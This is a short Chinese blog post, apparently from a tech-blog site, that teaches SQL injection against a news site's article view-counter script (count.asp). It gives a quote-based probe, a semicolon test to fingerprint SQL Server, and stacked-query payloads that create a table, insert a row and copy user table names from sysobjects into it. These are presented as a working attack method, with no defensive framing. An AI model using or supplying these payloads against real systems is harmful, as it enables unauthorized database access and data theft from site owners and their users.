SQL脚本注入1

全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。。 

  我来说说他们的文章系统原理:全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。 

  攻击方法: 

  查看源文件/看里面是否有通过JS来调用的页面。 

  如调用来更新文章的浏览次数。 

  我们就可以这样来试一下可否注入: 

  http://服务器域名/count.asp?id=1552’ 

  看一下是否出错。如出错说明有注入漏洞。然后正常攻击。 

  在本机建立一下post.htm的文件和log.txt的文本文件(用来记录用,这是一个好习惯) 

  post.htm内容:主要是方便输入。 

  对于SQLSERVER的服务器可以这样判断:在1552后加一分号,如正常有可能是SQLSERVER 

  对于这类数据库可以先建一个表id=1552;create table aaa(aaa char(20));-- 

  然后插入一条记录:id=1552;insert into aaa values(’test’);-- 

  再之后枚举出他的数据表名: 

  id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);-- 

  这是将第一个表名更新到aaa的字段处。 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值